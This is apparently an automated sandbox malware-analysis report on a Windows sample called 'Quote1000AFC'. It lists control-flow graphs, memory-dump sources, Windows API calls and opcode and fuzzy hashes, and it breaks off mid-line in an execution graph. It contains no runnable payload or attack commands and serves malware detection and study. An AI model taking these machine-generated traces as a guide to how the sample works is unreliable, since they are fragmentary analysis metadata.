                                                    control_flow_graph 2197 71d0452 2198 71d0454 2197->2198 2198->2198 2199 71d0456-71d0488 2198->2199 2200 71d048e-71d0493 2199->2200 2201 71d096b-71d09d4 2199->2201 2200->2201 2202 71d0499-71d04b6 2200->2202 2209 71d09db-71d0a63 2201->2209 2208 71d04bc-71d04c0 2202->2208 2202->2209 2210 71d04cf-71d04d3 2208->2210 2211 71d04c2-71d04cc 2208->2211 2245 71d0a6e-71d0aee 2209->2245 2213 71d04d5-71d04df 2210->2213 2214 71d04e2-71d04e9 2210->2214 2211->2210 2213->2214 2217 71d04ef-71d051f 2214->2217 2218 71d0604-71d0609 2214->2218 2227 71d0cee-71d0d14 2217->2227 2229 71d0525-71d05f8 2217->2229 2222 71d060b-71d060f 2218->2222 2223 71d0611-71d0616 2218->2223 2222->2223 2225 71d0618-71d061c 2222->2225 2226 71d0628-71d0658 2223->2226 2225->2227 2228 71d0622-71d0625 2225->2228 2226->2245 2246 71d065e-71d0661 2226->2246 2238 71d0d24 2227->2238 2239 71d0d16-71d0d22 2227->2239 2228->2226 2229->2218 2254 71d05fa 2229->2254 2240 71d0d27-71d0d2c 2238->2240 2239->2240 2262 71d0af5-71d0b77 2245->2262 2246->2245 2249 71d0667-71d0669 2246->2249 2249->2245 2251 71d066f-71d06a4 2249->2251 2261 71d06aa-71d06b3 2251->2261 2251->2262 2254->2218 2264 71d06b9-71d0713 2261->2264 2265 71d0816-71d081a 2261->2265 2266 71d0b7f-71d0c01 2262->2266 2304 71d0725 2264->2304 2305 71d0715-71d071e 2264->2305 2265->2266 2267 71d0820-71d0824 2265->2267 2270 71d0c09-71d0c36 2266->2270 2267->2270 2271 71d082a-71d0830 2267->2271 2282 71d0c3d-71d0cbd 2270->2282 2273 71d0834-71d0869 2271->2273 2274 71d0832 2271->2274 2278 71d0870-71d0876 2273->2278 2274->2278 2278->2282 2283 71d087c-71d0884 2278->2283 2339 71d0cc4-71d0ce6 2282->2339 2288 71d088b-71d088d 2283->2288 2289 71d0886-71d088a 2283->2289 2293 71d08ef-71d08f5 2288->2293 2294 71d088f-71d08b3 2288->2294 2289->2288 2300 71d0914-71d0942 2293->2300 2301 71d08f7-71d0912 2293->2301 2325 71d08bc-71d08c0 2294->2325 2326 71d08b5-71d08ba 2294->2326 2321 71d094a-71d0956 2300->2321 2301->2321 2310 71d0729-71d072b 2304->2310 2305->2310 2311 71d0720-71d0723 2305->2311 2317 71d072d 2310->2317 2318 71d0732-71d0736 2310->2318 2311->2310 2317->2318 2323 71d0738-71d073f 2318->2323 2324 71d0744-71d074a 2318->2324 2338 71d095c-71d0968 2321->2338 2321->2339 2333 71d07e1-71d07e5 2323->2333 2327 71d074c-71d0752 2324->2327 2328 71d0754-71d0759 2324->2328 2325->2227 2332 71d08c6-71d08c9 2325->2332 2335 71d08cc-71d08dd 2326->2335 2336 71d075f-71d0765 2327->2336 2328->2336 2332->2335 2340 71d0804-71d0810 2333->2340 2341 71d07e7-71d0801 2333->2341 2375 71d08df call 71d0d78 2335->2375 2376 71d08df call 71d0d88 2335->2376 2345 71d076b-71d0770 2336->2345 2346 71d0767-71d0769 2336->2346 2339->2227 2340->2264 2340->2265 2341->2340 2342 71d08e5-71d08ed 2342->2321 2350 71d0772-71d0784 2345->2350 2346->2350 2356 71d078e-71d0793 2350->2356 2357 71d0786-71d078c 2350->2357 2358 71d0799-71d07a0 2356->2358 2357->2358 2360 71d07a6 2358->2360 2361 71d07a2-71d07a4 2358->2361 2365 71d07ab-71d07b6 2360->2365 2361->2365 2367 71d07b8-71d07bb 2365->2367 2368 71d07da 2365->2368 2367->2333 2370 71d07bd-71d07c3 2367->2370 2368->2333 2371 71d07ca-71d07d3 2370->2371 2372 71d07c5-71d07c8 2370->2372 2371->2333 2374 71d07d5-71d07d8 2371->2374 2372->2368 2372->2371 2374->2333 2374->2368 2375->2342 2376->2342
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1489610557.00000000071D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071D0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_71d0000_Quote1000AFC.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 5485b1c62015857941566f331bb2b9b11e917710f948896a5b633dfd72d87302
                                                    • Instruction ID: 5ccd1dcb779506cdc32c5fa7186bc449b96a15b654cac96c500477f50ab51def
                                                    • Opcode Fuzzy Hash: 5485b1c62015857941566f331bb2b9b11e917710f948896a5b633dfd72d87302
                                                    • Instruction Fuzzy Hash: B3C149B5E002599FDF15CFA5C88479DBBB2BF88300F14C5AAD449AB295EB309985CF90

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 771 2c0b048-2c0b057 772 2c0b083-2c0b087 771->772 773 2c0b059-2c0b066 call 2c09ab8 771->773 775 2c0b089-2c0b093 772->775 776 2c0b09b-2c0b0dc 772->776 779 2c0b068 773->779 780 2c0b07c 773->780 775->776 782 2c0b0e9-2c0b0f7 776->782 783 2c0b0de-2c0b0e6 776->783 826 2c0b06e call 2c0b2d0 779->826 827 2c0b06e call 2c0b2e0 779->827 780->772 784 2c0b0f9-2c0b0fe 782->784 785 2c0b11b-2c0b11d 782->785 783->782 787 2c0b100-2c0b107 call 2c0ad00 784->787 788 2c0b109 784->788 790 2c0b120-2c0b127 785->790 786 2c0b074-2c0b076 786->780 789 2c0b1b8-2c0b278 786->789 792 2c0b10b-2c0b119 787->792 788->792 821 2c0b280-2c0b2ab GetModuleHandleW 789->821 822 2c0b27a-2c0b27d 789->822 793 2c0b134-2c0b13b 790->793 794 2c0b129-2c0b131 790->794 792->790 797 2c0b148-2c0b151 call 2c0ad10 793->797 798 2c0b13d-2c0b145 793->798 794->793 802 2c0b153-2c0b15b 797->802 803 2c0b15e-2c0b163 797->803 798->797 802->803 804 2c0b181-2c0b185 803->804 805 2c0b165-2c0b16c 803->805 828 2c0b188 call 2c0b5e0 804->828 829 2c0b188 call 2c0b5b0 804->829 805->804 807 2c0b16e-2c0b17e call 2c0ad20 call 2c0ad30 805->807 807->804 810 2c0b18b-2c0b18e 812 2c0b190-2c0b1ae 810->812 813 2c0b1b1-2c0b1b7 810->813 812->813 823 2c0b2b4-2c0b2c8 821->823 824 2c0b2ad-2c0b2b3 821->824 822->821 824->823 826->786 827->786 828->810 829->810
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1481156624.0000000002C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C00000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_2c00000_Quote1000AFC.jbxd
                                                    Similarity
                                                    • API ID: HandleModule
                                                    • String ID:
                                                    • API String ID: 4139908857-0
                                                    • Opcode ID: 97270ef4d3405d1c887b071f4d18b3b0461f2435b68338983652db41a0adfc2e
                                                    • Instruction ID: 141dc7ed6bda69fc376447398994f38217bae0ebb1906128ae245b4ac363fca4
                                                    • Opcode Fuzzy Hash: 97270ef4d3405d1c887b071f4d18b3b0461f2435b68338983652db41a0adfc2e
                                                    • Instruction Fuzzy Hash: 68712370A00B058FD724DF2AD48579ABBF6BF88308F00892DD49AD7A80DB75E945CF90

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 830 2c044b4-2c059b9 CreateActCtxA 833 2c059c2-2c05a1c 830->833 834 2c059bb-2c059c1 830->834 841 2c05a2b-2c05a2f 833->841 842 2c05a1e-2c05a21 833->842 834->833 843 2c05a40-2c05a70 841->843 844 2c05a31-2c05a3d 841->844 842->841 848 2c05a22-2c05a2a 843->848 849 2c05a72-2c05af4 843->849 844->843 848->841 852 2c059af-2c059b9 848->852 852->833 852->834
                                                    APIs
                                                    • CreateActCtxA.KERNEL32(?), ref: 02C059A9
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1481156624.0000000002C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C00000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_2c00000_Quote1000AFC.jbxd
                                                    Similarity
                                                    • API ID: Create
                                                    • String ID:
                                                    • API String ID: 2289755597-0
                                                    • Opcode ID: 3b1d2d33b79999dc27a906a7464f8e10ff2d0bd82071a281d7b7aa8ee06782a6
                                                    • Instruction ID: 926a2931319ee4a8ca82cfa58064194315f417d2c7bfe97f84481b1dd066ca3a
                                                    • Opcode Fuzzy Hash: 3b1d2d33b79999dc27a906a7464f8e10ff2d0bd82071a281d7b7aa8ee06782a6
                                                    • Instruction Fuzzy Hash: 0E4116B0D1071DCFDB24DFAAC884B9EBBB6BF84704F508059D408AB250DB716949CF90

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 853 2c058ed-2c059b9 CreateActCtxA 855 2c059c2-2c05a1c 853->855 856 2c059bb-2c059c1 853->856 863 2c05a2b-2c05a2f 855->863 864 2c05a1e-2c05a21 855->864 856->855 865 2c05a40-2c05a70 863->865 866 2c05a31-2c05a3d 863->866 864->863 870 2c05a22-2c05a2a 865->870 871 2c05a72-2c05af4 865->871 866->865 870->863 874 2c059af-2c059b9 870->874 874->855 874->856
                                                    APIs
                                                    • CreateActCtxA.KERNEL32(?), ref: 02C059A9
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1481156624.0000000002C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C00000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_2c00000_Quote1000AFC.jbxd
                                                    Similarity
                                                    • API ID: Create
                                                    • String ID:
                                                    • API String ID: 2289755597-0
                                                    • Opcode ID: 137093f964a07d73bc4bd325644b78c88395646ab42c534fccf9b9cdfbbf2350
                                                    • Instruction ID: eebcf5bad3ea91aa7d5cca71a83009ed0e489f326255e6d2538225e29de6de94
                                                    • Opcode Fuzzy Hash: 137093f964a07d73bc4bd325644b78c88395646ab42c534fccf9b9cdfbbf2350
                                                    • Instruction Fuzzy Hash: 534107B1D10719CFDB24DFA5C8847DDBBB6BF89704F208059D408AB251DB755949CF50

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 875 71d0d88-71d0d9a 876 71d0da2-71d0dad 875->876 885 71d0d9d call 71d0d78 875->885 886 71d0d9d call 71d0d88 875->886 877 71d0daf-71d0dbf 876->877 878 71d0dc2-71d0e54 CreateIconFromResourceEx 876->878 881 71d0e5d-71d0e7a 878->881 882 71d0e56-71d0e5c 878->882 882->881 885->876 886->876
                                                    APIs
                                                    • CreateIconFromResourceEx.USER32(?,?,?,?,?,?,?), ref: 071D0E47
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1489610557.00000000071D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071D0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_71d0000_Quote1000AFC.jbxd
                                                    Similarity
                                                    • API ID: CreateFromIconResource
                                                    • String ID:
                                                    • API String ID: 3668623891-0
                                                    • Opcode ID: 0cb4ccd0f089db408acc7a9aacab2190886c5aea0e0ef12a6d89f422f0700286
                                                    • Instruction ID: ccd7d8ef70d4cf6d5df98b9c16cd263bb72a87103009a31a3e07905527e6ce82
                                                    • Opcode Fuzzy Hash: 0cb4ccd0f089db408acc7a9aacab2190886c5aea0e0ef12a6d89f422f0700286
                                                    • Instruction Fuzzy Hash: 09316B729043499FCB11DFA9C844ADABFF8FF49310F14845AE654AB251C335E850CFA0

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 887 2c0af34-2c0d5bc DuplicateHandle 889 2c0d5c5-2c0d5e2 887->889 890 2c0d5be-2c0d5c4 887->890 890->889
                                                    APIs
                                                    • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,02C0D4EE,?,?,?,?,?), ref: 02C0D5AF
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1481156624.0000000002C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C00000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_2c00000_Quote1000AFC.jbxd
                                                    Similarity
                                                    • API ID: DuplicateHandle
                                                    • String ID:
                                                    • API String ID: 3793708945-0
                                                    • Opcode ID: 3e1eb03cafc159d27745d6726dd01ad35f7be88f1407f687389978a5af131aa9
                                                    • Instruction ID: b081bfcd34d30fa72b9f1bb3c16cfe1050945aa48c2bd392fb3d20733d1d3183
                                                    • Opcode Fuzzy Hash: 3e1eb03cafc159d27745d6726dd01ad35f7be88f1407f687389978a5af131aa9
                                                    • Instruction Fuzzy Hash: 1921E6B59003099FDB10CF9AD884ADEBBF5FB48314F14841AE919A7350D374A954CFA5

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 893 2c0d520-2c0d5bc DuplicateHandle 894 2c0d5c5-2c0d5e2 893->894 895 2c0d5be-2c0d5c4 893->895 895->894
                                                    APIs
                                                    • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,02C0D4EE,?,?,?,?,?), ref: 02C0D5AF
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1481156624.0000000002C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C00000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_2c00000_Quote1000AFC.jbxd
                                                    Similarity
                                                    • API ID: DuplicateHandle
                                                    • String ID:
                                                    • API String ID: 3793708945-0
                                                    • Opcode ID: d400a58f6cb910c99eb9f08048344709421fa4850092bcc3309d17c917a90e76
                                                    • Instruction ID: e34a9425e41301759f2ab476ac0e7833eeee4cf964d51ca11ab1d56a7b3521de
                                                    • Opcode Fuzzy Hash: d400a58f6cb910c99eb9f08048344709421fa4850092bcc3309d17c917a90e76
                                                    • Instruction Fuzzy Hash: 2921E6B5D003099FDB10CF99D985ADEBBF5FB48314F14841AE918A3350D378A950CF65

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 898 2c09ab8-2c0b278 900 2c0b280-2c0b2ab GetModuleHandleW 898->900 901 2c0b27a-2c0b27d 898->901 902 2c0b2b4-2c0b2c8 900->902 903 2c0b2ad-2c0b2b3 900->903 901->900 903->902
                                                    APIs
                                                    • GetModuleHandleW.KERNELBASE(00000000,?,?,?,?,?,?,?,02C0B064), ref: 02C0B29E
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1481156624.0000000002C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C00000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_2c00000_Quote1000AFC.jbxd
                                                    Similarity
                                                    • API ID: HandleModule
                                                    • String ID:
                                                    • API String ID: 4139908857-0
                                                    • Opcode ID: 1caebaa58eed17e797cbc24ba75a1b5e34163c6db0b418f943704e3a44b6647a
                                                    • Instruction ID: 8536178cc1316e866dcf19cd2d80787a27c979a61b4524baf22e8961c5d6cdbc
                                                    • Opcode Fuzzy Hash: 1caebaa58eed17e797cbc24ba75a1b5e34163c6db0b418f943704e3a44b6647a
                                                    • Instruction Fuzzy Hash: A711F0B5D006498FCB20DF9AC484A9EFBF4AB88314F10845AD929A7240C379A945CFA1
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1477363252.0000000002ABD000.00000040.00000800.00020000.00000000.sdmp, Offset: 02ABD000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_2abd000_Quote1000AFC.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 43197e1b612ff92bb98f50eefb8d772d65bc2b9c96bec9ec1c2680d08eb88191
                                                    • Instruction ID: ca2e2fd2b2191cd48a0cce5ca36a1ae4884ad46c93f9cd5c53173137561a1264
                                                    • Opcode Fuzzy Hash: 43197e1b612ff92bb98f50eefb8d772d65bc2b9c96bec9ec1c2680d08eb88191
                                                    • Instruction Fuzzy Hash: D3210371504644DFDB06DF14D9C0B66BF69FF88328F20C669E8090B257C736D456CBA2
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1477363252.0000000002ABD000.00000040.00000800.00020000.00000000.sdmp, Offset: 02ABD000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_2abd000_Quote1000AFC.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 324757a9c00a135778c56060592dceb3f43247e9626cec6707358907d2c6f859
                                                    • Instruction ID: 2de3ad3ddccc7a6793dccd8f74835abedac689b43fabc43f08974682a234c553
                                                    • Opcode Fuzzy Hash: 324757a9c00a135778c56060592dceb3f43247e9626cec6707358907d2c6f859
                                                    • Instruction Fuzzy Hash: F2210675504704DFDB0ADF10D9C4B56BB69FF84324F20C569D8090B257C736E456CBA2
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1477521675.0000000002ACD000.00000040.00000800.00020000.00000000.sdmp, Offset: 02ACD000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_2acd000_Quote1000AFC.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: e4da31d7af0bf7229cd572663b9448d8f96d5e0d1e303b3601ec69e624855bfd
                                                    • Instruction ID: 7a08abd016a6584cbb329a9390aa55e281b6484c3812abe27f32d29b59f09b60
                                                    • Opcode Fuzzy Hash: e4da31d7af0bf7229cd572663b9448d8f96d5e0d1e303b3601ec69e624855bfd
                                                    • Instruction Fuzzy Hash: C421D075604704EFDB14DF18D9C4B16BBA5FB84224F30C57DD84A4B286CB3AD847CA62
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1477521675.0000000002ACD000.00000040.00000800.00020000.00000000.sdmp, Offset: 02ACD000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_2acd000_Quote1000AFC.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 007106cbafac037bf259351a59343abc68295e6a9d9da8ff01fc81050d2fae9f
                                                    • Instruction ID: 816fd158c95cd59b1c452726ae036bb1d594efc9a5c4861a4adfbfd414eb000a
                                                    • Opcode Fuzzy Hash: 007106cbafac037bf259351a59343abc68295e6a9d9da8ff01fc81050d2fae9f
                                                    • Instruction Fuzzy Hash: A521D0B5604704EFDB05DF10D9C4B26FBA5FB88214F30C67DE8494B29ACB36D446CA61
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1477521675.0000000002ACD000.00000040.00000800.00020000.00000000.sdmp, Offset: 02ACD000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_2acd000_Quote1000AFC.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: f169441a4b251e4b1d13cc7657fa02ad4c5d3e23d9cc44baba55ca37f04e7a53
                                                    • Instruction ID: d91bf78f04fff00eda05196292f1e3ec8c4b3dad4f74a2b08dfc637be19cfa60
                                                    • Opcode Fuzzy Hash: f169441a4b251e4b1d13cc7657fa02ad4c5d3e23d9cc44baba55ca37f04e7a53
                                                    • Instruction Fuzzy Hash: 3D2150755097809FCB12CF24D5D4715BF71EB46224F28C5EED8898F6A7C33A940ACB62
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1477363252.0000000002ABD000.00000040.00000800.00020000.00000000.sdmp, Offset: 02ABD000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_2abd000_Quote1000AFC.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: e3062b24f5b0128947100ec6e500ced3c6d63245422b7ec3b5033f72fc324263
                                                    • Instruction ID: 2f1e02d8b9c79ffe098af55a0299abed90fe449470a264fd6b5162bdae71e72e
                                                    • Opcode Fuzzy Hash: e3062b24f5b0128947100ec6e500ced3c6d63245422b7ec3b5033f72fc324263
                                                    • Instruction Fuzzy Hash: 4911AC76504684CFCB16CF14D9C4B56BF72FB88328F24C6A9D8490B657C33AD45ACBA2
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1477363252.0000000002ABD000.00000040.00000800.00020000.00000000.sdmp, Offset: 02ABD000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_2abd000_Quote1000AFC.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: e3062b24f5b0128947100ec6e500ced3c6d63245422b7ec3b5033f72fc324263
                                                    • Instruction ID: cb6776cc7f07da3c3bd6d988f677ae38b215371f31d5ea545b48a24fdb826c53
                                                    • Opcode Fuzzy Hash: e3062b24f5b0128947100ec6e500ced3c6d63245422b7ec3b5033f72fc324263
                                                    • Instruction Fuzzy Hash: 0411ACB6504680DFCB16CF14D9C4B56BF72FB84324F24C6A9D8490B657C33AE45ACBA2
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1477521675.0000000002ACD000.00000040.00000800.00020000.00000000.sdmp, Offset: 02ACD000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_2acd000_Quote1000AFC.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 8009cd9747851c6a16484d38da83a80e1112e09f0888f91abd329c0e09305381
                                                    • Instruction ID: b6aa9a1b1d5828087b2bbcbf205b9c0c6ecbca07300eb965d57ee80c89228080
                                                    • Opcode Fuzzy Hash: 8009cd9747851c6a16484d38da83a80e1112e09f0888f91abd329c0e09305381
                                                    • Instruction Fuzzy Hash: C911DD76504680DFCB01CF10C9C0B15FBB2FB84324F24C6AED8494B29AC33AD40ACB61
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1489610557.00000000071D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071D0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_71d0000_Quote1000AFC.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: <ov!
                                                    • API String ID: 0-3980319286
                                                    • Opcode ID: 81da5ee1d9f893449535ddb9dbf009c0883c9d9b6b579eea7581ed5013637665
                                                    • Instruction ID: 33981239a66db4287c4f094cba71c9fe4c9a827679879c9d12e89a933db7ed9d
                                                    • Opcode Fuzzy Hash: 81da5ee1d9f893449535ddb9dbf009c0883c9d9b6b579eea7581ed5013637665
                                                    • Instruction Fuzzy Hash: 68B2D375E00228CFDB65CF69C984AD9BBB2FF89300F1581E9D509AB265DB319E81CF50
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1481156624.0000000002C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C00000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_2c00000_Quote1000AFC.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 7e048c7a41bbd5f7307b43a8361ca6d1d48b58f3b3c7bd4d3f5fcaaaa798744f
                                                    • Instruction ID: 32ecb9f913e945515eaa7ecb21d7fb3860ace126aabaf052aa8a304da7065dcf
                                                    • Opcode Fuzzy Hash: 7e048c7a41bbd5f7307b43a8361ca6d1d48b58f3b3c7bd4d3f5fcaaaa798744f
                                                    • Instruction Fuzzy Hash: A3A16032E102158FCF15DFB4C48459EB7B2FF84300B1585AAE816AB2A5DF71E956CF80
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1489610557.00000000071D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071D0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_71d0000_Quote1000AFC.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 892473b9c96ad22d4951ac7c81790cbf0cdb0649fa46a45241c73750c1368bd5
                                                    • Instruction ID: 2104aa9b6143bf73c00b36f5338e7aa1c34433b160be7a19a99f73e2d86907f5
                                                    • Opcode Fuzzy Hash: 892473b9c96ad22d4951ac7c81790cbf0cdb0649fa46a45241c73750c1368bd5
                                                    • Instruction Fuzzy Hash: ADB172B5E016188FDB68DF6AC9446DDBBF2AF89300F14C1A9D809AB364DB305E85CF50
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1489610557.00000000071D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071D0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_71d0000_Quote1000AFC.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: f4bdb1659d9c9ea6af4d041c0d1e5a5205607b4c4b05cb05da9487e94c803d96
                                                    • Instruction ID: d40ec667ef4c9beb094a218dd8e7eefc169b28f93dbe3ef635c885ee7ab50afc
                                                    • Opcode Fuzzy Hash: f4bdb1659d9c9ea6af4d041c0d1e5a5205607b4c4b05cb05da9487e94c803d96
                                                    • Instruction Fuzzy Hash: AB611AB1A106498FEB09EF7AE94569ABBF2FFC8300F14C169D4049B359EF706806DB41
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1489610557.00000000071D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071D0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_71d0000_Quote1000AFC.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 28bb9a8641c90044d8e565b906d8fe1f76a726644876e133497edfd0c54fb135
                                                    • Instruction ID: 8a17173de921e3cb61f4a24a1df0681744e1f7f5911dbf57a3f4b5b398b27022
                                                    • Opcode Fuzzy Hash: 28bb9a8641c90044d8e565b906d8fe1f76a726644876e133497edfd0c54fb135
                                                    • Instruction Fuzzy Hash: E261F8B1A106498FEB09EF6AE94569ABBF2FFC8300F14C569D4089B359EF706805DB41
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1490779647.0000000007A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 079F0000, based on PE: true
                                                    • Associated: 00000000.00000002.1490518252.00000000079F0000.00000004.08000000.00040000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_79f0000_Quote1000AFC.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 76e32e8b9f61abb0c152f36c6ceb7f4814611c9e04c6bd2115863260be2a4d8f
                                                    • Instruction ID: 1325b1b90370b7e225094e7d63b4ae411d9677143ece2a58eb6d8e6c45e31597
                                                    • Opcode Fuzzy Hash: 76e32e8b9f61abb0c152f36c6ceb7f4814611c9e04c6bd2115863260be2a4d8f
                                                    • Instruction Fuzzy Hash: F321E5B1E047188BEB58CFABC95479EBAF7BFC9300F04C0B9C518AA254EB344A459F51

                                                    Execution Graph

                                                    Execution Coverage:6.4%
                                                    Dynamic/Decrypted Code Coverage:100%
                                                    Signature Coverage:0%
                                                    Total number of Nodes:64
                                                    Total number of Limit Nodes:5
                                                    execution_graph 28322 69b5e58 28323 69b5e5b 28322->28323 28325 69b5e89 28323->28325 28326 69b5a9c 28323->28326 28327 69b5aa7 28326->28327 28328 69b61a3 28327->28328 28330 69b5ab8 28327->28330 28328->28325 28331 69b61d8 OleInitialize 28330->28331 28332 69b623c 28331->28332 28332->28328 28386 17dae98 DuplicateHandle 28387 17daf2e 28386->28387 28388 17dac50 28389 17dac96 GetCurrentProcess 28388->28389 28391 17dace8 GetCurrentThread 28389->28391 28392 17dace1 28389->28392 28393 17dad1e 28391->28393 28394 17dad25 GetCurrentProcess 28391->28394 28392->28391 28393->28394 28397 17dad5b 28394->28397 28395 17dad83 GetCurrentThreadId 28396 17dadb4 28395->28396 28397->28395 28333 153d01c 28334 153d034 28333->28334 28335 153d08e 28334->28335 28338 69b1a38 28334->28338 28347 69b1a28 28334->28347 28341 69b1a65 28338->28341 28339 69b1a99 28373 69b0b0c 28339->28373 28341->28339 28342 69b1a89 28341->28342 28357 69b1c8c 28342->28357 28363 69b1bc0 28342->28363 28368 69b1bb0 28342->28368 28343 69b1a97 28348 69b19f2 28347->28348 28349 69b1a32 28347->28349 28348->28335 28350 69b1a99 28349->28350 28353 69b1a89 28349->28353 28351 69b0b0c CallWindowProcW 28350->28351 28352 69b1a97 28351->28352 28354 69b1c8c CallWindowProcW 28353->28354 28355 69b1bb0 CallWindowProcW 28353->28355 28356 69b1bc0 CallWindowProcW 28353->28356 28354->28352 28355->28352 28356->28352 28358 69b1c4a 28357->28358 28359 69b1c9a 28357->28359 28377 69b1c78 28358->28377 28380 69b1c68 28358->28380 28360 69b1c60 28360->28343 28364 69b1bd4 28363->28364 28366 69b1c78 CallWindowProcW 28364->28366 28367 69b1c68 CallWindowProcW 28364->28367 28365 69b1c60 28365->28343 28366->28365 28367->28365 28370 69b1bd4 28368->28370 28369 69b1c60 28369->28343 28371 69b1c78 CallWindowProcW 28370->28371 28372 69b1c68 CallWindowProcW 28370->28372 28371->28369 28372->28369 28374 69b0b17 28373->28374 28375 69b307a CallWindowProcW 28374->28375 28376 69b3029 28374->28376 28375->28376 28376->28343 28378 